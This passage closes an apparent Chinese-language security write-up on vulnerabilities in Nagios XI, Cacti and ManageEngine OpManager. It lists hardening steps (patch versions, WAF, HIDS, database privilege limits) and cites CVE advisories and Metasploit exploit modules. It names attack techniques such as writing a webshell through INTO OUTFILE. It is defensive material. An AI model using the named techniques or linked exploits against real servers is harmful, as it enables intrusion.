  • 及时升级:订阅厂商安全公告,第一时间应用安全补丁
  • Nagios XI ≥ 2024R1.4.2、Cacti ≥ 1.2.26、OpManager ≥ 128668
  • 在 Web 服务器层启用 WAF 规则,拦截 SQL 注入和命令注入 payload
  • 为 Nagios Web 用户启用 SELinux/AppArmor 强制模式

4. 日志与监控:

  • 部署 HIDS(OSSEC/Wazuh)监控关键文件完整性
  • 配置 ELK/Splunk 收集 Web 访问日志并设置异常告警
  • 监控以下关键行为:异常的 Web 目录写入、非授权的进程创建、数据库异常查询
  • 对 SSH 暴力破解、Web 目录扫描实施自动封禁

5. 数据库安全:

  • 修改监控平台的默认 MySQL/MariaDB 密码
  • 限制数据库用户权限,禁用 FILE 权限(防止 INTO OUTFILE 写 webshell)
  • 数据库监听地址绑定 127.0.0.1,禁止远程访问
  • 定期备份监控配置和数据库

0x07 参考资料

  1. Nagios XI 官方安全公告 - https://www.nagios.com/security-disclosures/nagios-xi/
  2. NCC Group - Multiple Vulnerabilities in Nagios XI (CVE-2023-47401 等 16 个漏洞) - https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
  3. NVD - CVE-2024-24401 Nagios XI SQL Injection - https://nvd.nist.gov/vuln/detail/CVE-2024-24401
  4. SonarSource - Cacti Unauthenticated RCE (CVE-2022-46169) - https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/
  5. Black Duck CyRC - CVE-2023-51448 Cacti Blind SQLi - https://www.blackduck.com/blog/cyrc-vulnerability-advisory-cve-2023-51448.html
  6. GitHub - Cacti Security Advisory GHSA-pfh9-gwm6-86vp (CVE-2023-49084) - https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp
  7. Haxolot - Pre-Auth RCE in ManageEngine OpManager (CVE-2021-3287) - https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/
  8. ManageEngine OpManager Security Updates - https://www.manageengine.com/network-monitoring/security-updates/
  9. Metasploit - Nagios XI ConfigWizards Authenticated RCE - https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce/
  10. Rapid7 - ManageEngine OpManager SUM Deserialization (CVE-2020-28653/CVE-2021-3287) - https://github.com/rapid7/metasploit-framework/pull/15670
  11. Tenable - ManageEngine OpManager RCE (CVE-2024-5466) - https://www.tenable.com/plugins/nessus/206271
  12. Obrela - Nagios XI CVE-2024-24401 Advisory - https://www.obrela.com/advisory/nagios-xi-critical-vulnerability-with-cve-2024-24401/